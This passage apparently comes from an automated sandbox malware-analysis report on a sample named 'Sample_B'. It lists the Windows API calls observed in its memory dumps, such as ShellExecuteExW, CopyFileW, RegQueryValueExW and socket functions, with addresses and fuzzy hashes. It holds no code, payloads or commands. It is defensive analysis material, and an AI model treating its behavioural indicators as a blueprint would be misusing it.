                                                                                  • Instruction ID: a2cefd65645615793290228925edc57b4a005d7e115ff682d69f69f6a40a09c7
                                                                                  • Opcode Fuzzy Hash: 95f06e8b8575317c2afbd1cd227ecac06cc0a9b9a278fafbc6015a6de1d4cc69
                                                                                  • Instruction Fuzzy Hash: 2221C071504704EFFB21DF51DC45BA6FBE8EF08320F14846EEA898B252D371A914DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 005D1A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadShim
                                                                                  • String ID:
                                                                                  • API String ID: 1475914169-0
                                                                                  • Opcode ID: 6e6338cef04cd62e9f15ff028a8f4a64f51c3d2500fad66646267bbd151630e9
                                                                                  • Instruction ID: 915eb92cf127f3238fc67a1d201c251fed5f364a70541531a491a9df7463a318
                                                                                  • Opcode Fuzzy Hash: 6e6338cef04cd62e9f15ff028a8f4a64f51c3d2500fad66646267bbd151630e9
                                                                                  • Instruction Fuzzy Hash: 4D2190B1509780AFE722CB15DC45B62BFE8FF16310F08809BED848B253D265A908DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D01FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 7bd0064a37d6c21ce007f9ffb599688e2c9a8eefda9b11b7bff944ed62edb9aa
                                                                                  • Instruction ID: 5f289382b46d8e3acc99b0a36a8eec2a6ef837f461d82046f547c58a153e0528
                                                                                  • Opcode Fuzzy Hash: 7bd0064a37d6c21ce007f9ffb599688e2c9a8eefda9b11b7bff944ed62edb9aa
                                                                                  • Instruction Fuzzy Hash: 1F11AC76500700EFEB31CE55DC84FA7BBE8FF04720F04855BE9469A281D670E948CA71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetProcessTimes.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessTimes
                                                                                  • String ID:
                                                                                  • API String ID: 1995159646-0
                                                                                  • Opcode ID: f65b465012d19383efe52af4fca8bcdb9ca2595ed8f31a918eec443b926411a5
                                                                                  • Instruction ID: 9fc14437821b71370bb1a23942f598578833da8cb1dfab84c7bd0d5cf562dc6c
                                                                                  • Opcode Fuzzy Hash: f65b465012d19383efe52af4fca8bcdb9ca2595ed8f31a918eec443b926411a5
                                                                                  • Instruction Fuzzy Hash: A411B272500704EFFB21CF55DC85FAAFBA8EF04720F14856BF9098B291D671A9449BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSAEventSelect.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D11C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: EventSelect
                                                                                  • String ID:
                                                                                  • API String ID: 31538577-0
                                                                                  • Opcode ID: d805bf52d4beedd13bc51a5ef7809e3a211b4dd132867f95498d2c8b8906e389
                                                                                  • Instruction ID: 0fd71ffc39fdddb483d7b24dae2a294ab418dbe786e676919c82f44fe51abff8
                                                                                  • Opcode Fuzzy Hash: d805bf52d4beedd13bc51a5ef7809e3a211b4dd132867f95498d2c8b8906e389
                                                                                  • Instruction Fuzzy Hash: AE119076400704EFEB21DF95CC85F96FBECEF04321F14856BEA09DA241D674A9448AB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • getsockname.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0EFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: getsockname
                                                                                  • String ID:
                                                                                  • API String ID: 3358416759-0
                                                                                  • Opcode ID: c3de1c1e8a6cdbee51f8f7f34cd9cef10fbb06fafe25a26304eb18e3a0c60c4e
                                                                                  • Instruction ID: 6526d2caa3f5a7d115f531a403ded9b061ada42801abf893d87708cb086c7621
                                                                                  • Opcode Fuzzy Hash: c3de1c1e8a6cdbee51f8f7f34cd9cef10fbb06fafe25a26304eb18e3a0c60c4e
                                                                                  • Instruction Fuzzy Hash: DB116D72500304EFEB20CF55DC85FA6BBA8EF04760F1489ABE9099B281D674A9448A75
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0027A61A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 95cf4fadef43583aaa57caf10a2ec54f4258aec7f8676f2e80b3d15bfed69a3e
                                                                                  • Instruction ID: d93ec3f9217dab2c8246e8e4253c04062f2698f96e924df1674226b3c60dbdda
                                                                                  • Opcode Fuzzy Hash: 95cf4fadef43583aaa57caf10a2ec54f4258aec7f8676f2e80b3d15bfed69a3e
                                                                                  • Instruction Fuzzy Hash: D9118472409380AFDB22CF51DC44B62FFF4EF5A320F0885DAED898B552C275A518DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 005D2E18
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID:
                                                                                  • API String ID: 587946157-0
                                                                                  • Opcode ID: e480ea5a6b678adab3787eadd4b2a3121ff8530f6716c3003b3f0f5a3fba6c84
                                                                                  • Instruction ID: eeb8a548b49257619526419fb41345d6ec7bc84e93a48ad5a48240bd99f96f84
                                                                                  • Opcode Fuzzy Hash: e480ea5a6b678adab3787eadd4b2a3121ff8530f6716c3003b3f0f5a3fba6c84
                                                                                  • Instruction Fuzzy Hash: 6711B6715093809FD712CF25DC44B52BFA8EF16220F0880EBED49CF252D275E908CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027BF31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: 4e4a2030aae92839bbf5e3b0fb3b2effa52b1052d04004f5ef1a5f13295a31e7
                                                                                  • Instruction ID: 6a310bd180988371a3c6aeb9c97234c7db3fab6c9295f8e09822023fe34a7f88
                                                                                  • Opcode Fuzzy Hash: 4e4a2030aae92839bbf5e3b0fb3b2effa52b1052d04004f5ef1a5f13295a31e7
                                                                                  • Instruction Fuzzy Hash: 6D11C172400300EFEB21DF51DC45FA6FBA8EF04720F1485AAFD099A641C771A9148BB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0027A6CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: da9860313241ef942ed2848d7b9114f3dc9a35664271eb17ff53440b0a9f9ffe
                                                                                  • Instruction ID: acdfbbd46e4a4f4fc0d34c239697a0425c21e9778114ce2689464908de481f17
                                                                                  • Opcode Fuzzy Hash: da9860313241ef942ed2848d7b9114f3dc9a35664271eb17ff53440b0a9f9ffe
                                                                                  • Instruction Fuzzy Hash: 38116A714093C49FEB128B25DC54BA2BFB4EF47620F0980DBED889B263D2655908DB72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 005D0142
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleCtrlHandler
                                                                                  • String ID:
                                                                                  • API String ID: 1513847179-0
                                                                                  • Opcode ID: 99c7c666df4cc3807ce4f019c0f8848cf228b0fe84efe99ec8f0d6b8263af7ae
                                                                                  • Instruction ID: 6a0024a5c5d3924413da74d29e88a2cca8efc85f78f8a579df3bfebc3571a3de
                                                                                  • Opcode Fuzzy Hash: 99c7c666df4cc3807ce4f019c0f8848cf228b0fe84efe99ec8f0d6b8263af7ae
                                                                                  • Instruction Fuzzy Hash: 5F11C471909380AFD311CB25CC45F26FFB4EF86720F19819FEC489B692D225B915CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0FDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3577187118-0
                                                                                  • Opcode ID: ee97b107b39dbdd254332ce41a1c568f3ddba524a4e36e97469b5450e98ba215
                                                                                  • Instruction ID: 5f5e23d5571cc747ac29356c2f041e4b54cb7e42ccf041c8d873a26fda09b0eb
                                                                                  • Opcode Fuzzy Hash: ee97b107b39dbdd254332ce41a1c568f3ddba524a4e36e97469b5450e98ba215
                                                                                  • Instruction Fuzzy Hash: 3711E072500340EFFB21DF14CC85FA6FBA8EF04720F14846BEA089B281C674A9448BB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3375834691-0
                                                                                  • Opcode ID: 66fac4da3f6fffc46d99857c57c62fcf4a78afb8f72f7a10101a96967dbc844b
                                                                                  • Instruction ID: 7ee1f4ca86f916b487e106b2c4068957e6cc6fe89717afe74aa74ef3b7d28a7e
                                                                                  • Opcode Fuzzy Hash: 66fac4da3f6fffc46d99857c57c62fcf4a78afb8f72f7a10101a96967dbc844b
                                                                                  • Instruction Fuzzy Hash: 8211277650D7C09FD7128B25DC85B52BFB4EF13220F0880DBED858F263D265A908DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Atom
                                                                                  • String ID:
                                                                                  • API String ID: 2154973765-0
                                                                                  • Opcode ID: 17d01598eceaa200e604bcc4331b4ed18cf66dacd02a98c2fdf197947a17ccb0
                                                                                  • Instruction ID: 5341f0e04a921e2c1ac5dc7005301a5ecd3df3e5d319998289f622b81a2de9a2
                                                                                  • Opcode Fuzzy Hash: 17d01598eceaa200e604bcc4331b4ed18cf66dacd02a98c2fdf197947a17ccb0
                                                                                  • Instruction Fuzzy Hash: E61198715097809FD722CB15DC95B52BFA4EF02220F0884DBED858F253D2759904C762
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: e0151772889d0a1fafa25ff1e1bbf36c6451ec2e04941f71fd3ce40e3f5b08c3
                                                                                  • Instruction ID: 022e47c6f79e12b5489cb64be7a9098fa05c70cb0728c803fa59e988209984dc
                                                                                  • Opcode Fuzzy Hash: e0151772889d0a1fafa25ff1e1bbf36c6451ec2e04941f71fd3ce40e3f5b08c3
                                                                                  • Instruction Fuzzy Hash: 7311BE76509380AFDB228B15DC45B52BFB4EF16320F08809EED854B663C265A918DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0027A32C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: 1f4fcdf0653904be44c5cba11a39eb6978fc0afb449686de9e1d3cfb895f66ce
                                                                                  • Instruction ID: 575242d60534087a1e3b204ffd86b282a874371253f96ca0fe734885b5d0b39d
                                                                                  • Opcode Fuzzy Hash: 1f4fcdf0653904be44c5cba11a39eb6978fc0afb449686de9e1d3cfb895f66ce
                                                                                  • Instruction Fuzzy Hash: EC11E9715093809FDB12CF15DC85B96FFA4EF42320F08C0EBED898B652D275A818DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: c3d8c679a6198861511cb88ec1182be0222a7323bf91924fc3ef55adefd08207
                                                                                  • Instruction ID: 5a89e7b7259b0eeb679ce17ad1541dbf34cd9498413300e070565b5d9552c3d8
                                                                                  • Opcode Fuzzy Hash: c3d8c679a6198861511cb88ec1182be0222a7323bf91924fc3ef55adefd08207
                                                                                  • Instruction Fuzzy Hash: 62119071404780AFDB21CF55DC44B92FFF4EF06320F0984ABE9898B662C375A418DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,?,?), ref: 005D2CB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 739e30b0268f3409bcbbfe867d521d8fdc755f741f8c35b29763400b248190c1
                                                                                  • Instruction ID: 63bfe05ca99bd040e98f0905d64aabb382af0222f23764a6cc1b9a597fec57b0
                                                                                  • Opcode Fuzzy Hash: 739e30b0268f3409bcbbfe867d521d8fdc755f741f8c35b29763400b248190c1
                                                                                  • Instruction Fuzzy Hash: 7A1130716142409BEB20CF19DC85756FFD8EB24761F08846BED09CB751D671DD04DA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: 41883ef3f56f4dd2a121763323eba1bfd216204aa2115dea5d3526f33f84e54e
                                                                                  • Instruction ID: 8ec00b62c7bf2c968fd4895a1bada72e026bef48d1c6cbc436771644a96fe146
                                                                                  • Opcode Fuzzy Hash: 41883ef3f56f4dd2a121763323eba1bfd216204aa2115dea5d3526f33f84e54e
                                                                                  • Instruction Fuzzy Hash: 1B11A3725083849FE721CF15DC85A92FFE4EF16320F0980DFED858B262C275A808DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027BD95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: 8b18a1b50910cf150b4bca2354069e9755a348e171c7d9ba7f465acd8a80bcf0
                                                                                  • Instruction ID: b7be90f451e267cb413f0ce934df03aec3c6617244728b8b91646feb83231c8e
                                                                                  • Opcode Fuzzy Hash: 8b18a1b50910cf150b4bca2354069e9755a348e171c7d9ba7f465acd8a80bcf0
                                                                                  • Instruction Fuzzy Hash: 6701DE76510300EFFB21CF11DC85BA6FB98EF04721F14C09AFE099B281D6B4A9048AB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: cdb967a3caa246dc3852ce1b7378c8b57100385fcb9e6f53ac3dd9bd74a5d0c1
                                                                                  • Instruction ID: 594e6870aadeebdef725bb54e2e79e82593106a5de7cdabf1ee08b0cf6aab0e3
                                                                                  • Opcode Fuzzy Hash: cdb967a3caa246dc3852ce1b7378c8b57100385fcb9e6f53ac3dd9bd74a5d0c1
                                                                                  • Instruction Fuzzy Hash: AA118F315093809FDB228F15CC44A52FFB4EF16220F0985DBE9854B263C275A818DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 005D2131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPoint32Text
                                                                                  • String ID:
                                                                                  • API String ID: 223599850-0
                                                                                  • Opcode ID: 1e6da5edafdf39e845603a9c478794309fa0f5cbea3302af3e87edfafb35e7cd
                                                                                  • Instruction ID: 699cf61e1fe70b149f6888ccf210e686a5dca8aa6c7a248f988414d1f5b68f9c
                                                                                  • Opcode Fuzzy Hash: 1e6da5edafdf39e845603a9c478794309fa0f5cbea3302af3e87edfafb35e7cd
                                                                                  • Instruction Fuzzy Hash: F2112A75900200DFEB20CF59D885B66FBE8FB24761F08C4ABED498B352D671E904DA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000E40,?,?), ref: 005D138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileMapping
                                                                                  • String ID:
                                                                                  • API String ID: 524692379-0
                                                                                  • Opcode ID: a0a9c9cdd4a2ea4cb44492edc8fc9539345656aacd14f9ef579aefe80d1046b3
                                                                                  • Instruction ID: fdff6b9847c690cd704c98d59501f9d57bd210e6cf3ae31a82a7aef24c6efa6d
                                                                                  • Opcode Fuzzy Hash: a0a9c9cdd4a2ea4cb44492edc8fc9539345656aacd14f9ef579aefe80d1046b3
                                                                                  • Instruction Fuzzy Hash: 2E017171900600ABE310DF16DC46B66FBA8FB84A20F14816AED099B741D235B515CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 005D2E18
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID:
                                                                                  • API String ID: 587946157-0
                                                                                  • Opcode ID: 0465ed9b44a4d4d14b2252c704ad8aa4ef86cb3cea728b9083d0dc31185c4dcd
                                                                                  • Instruction ID: 7ae5c4ab1e16fec4c04b7a1ba7b910405ba2633fc0224fab2138c69cce173bda
                                                                                  • Opcode Fuzzy Hash: 0465ed9b44a4d4d14b2252c704ad8aa4ef86cb3cea728b9083d0dc31185c4dcd
                                                                                  • Instruction Fuzzy Hash: A7018C716002408FEB20CF29D8857A6FB98EB10721F4884ABDD09CB342D674E944DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetWindowPlacement.USER32(?,?), ref: 005D271F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: PlacementWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2154376794-0
                                                                                  • Opcode ID: 813600621f579c97659cdb09219ce5ec971b490e7badee3cf014b07e21652a52
                                                                                  • Instruction ID: 1140ae055df5482de2231f1614f9b09ef336436a3768fd8e9a8106fa37c2c84d
                                                                                  • Opcode Fuzzy Hash: 813600621f579c97659cdb09219ce5ec971b490e7badee3cf014b07e21652a52
                                                                                  • Instruction Fuzzy Hash: 3D11A1755083809FDB21CF15DC45B52FFB4EF16320F0980DBED894B262C275A809DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSAStartup.WS2_32(?,00000E40,?,?), ref: 0027A1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Startup
                                                                                  • String ID:
                                                                                  • API String ID: 724789610-0
                                                                                  • Opcode ID: 99d574dda8f2c559446cfff6518e46ef7327dd7e539a38642d409ed2b6bc1beb
                                                                                  • Instruction ID: f3aa4a9e39c0532c4fe269de14c7624fc064a201f150f52b1b02a11b2177656e
                                                                                  • Opcode Fuzzy Hash: 99d574dda8f2c559446cfff6518e46ef7327dd7e539a38642d409ed2b6bc1beb
                                                                                  • Instruction Fuzzy Hash: 8C018471900700AFE710DF16DC46B66FBE8FB84A20F14816AED089B741D235F515CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

APIs
• LoadLibraryShim.MSCOREE(?,?,?,?), ref: 005D1A05
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: LibraryLoadShim
• String ID:
• API String ID: 1475914169-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0027A61A
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: Atom
• String ID:
• API String ID: 2154973765-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 005D0142
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: ConsoleCtrlHandler
• String ID:
• API String ID: 1513847179-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• UnmapViewOfFile.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 005D14D0
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: FileUnmapView
• String ID:
• API String ID: 2564024751-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 0027B802
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
Uniqueness
Uniqueness Score: -1.00%

APIs
